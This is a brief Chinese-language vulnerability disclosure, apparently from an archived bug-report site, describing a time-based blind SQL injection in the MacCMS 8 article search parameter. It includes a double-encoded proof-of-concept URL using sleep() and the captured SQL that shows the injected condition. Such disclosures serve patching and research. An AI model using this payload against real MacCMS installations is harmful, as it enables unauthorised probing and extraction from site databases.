### 简要描述:
苹果CMS sql注入一枚
### 详细说明:
分析参考: http://wooyun.org/bugs/wooyun-2014-066661
利用参考: http://wooyun.org/bugs/wooyun-2014-074281
这里就不做代码分析了:
访问url:
http://localhost/maccms8/index.php?m=art-search-wd-x%2527%2529%253E0%2520and%2520sleep%2528if%25281%252C5%252C1%2529%2529%2523
这里 默认安装完毕后 mac_art表没有数据,我们插入一条数据
[<img src="https://images.seebug.org/upload/201410/08215222eb5b4d5708643d031498385de77480ca.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08215222eb5b4d5708643d031498385de77480ca.png)
然后再访问刚才的url,延时五秒:
抓取到的sql:
SELECT count(*) FROM mac_art WHERE 1=1 AND instr(a_name,'1111111')>0 and sleep(if(1,5,1))#')>0
### 漏洞证明:
京公网安备 11010502034610号
暂无评论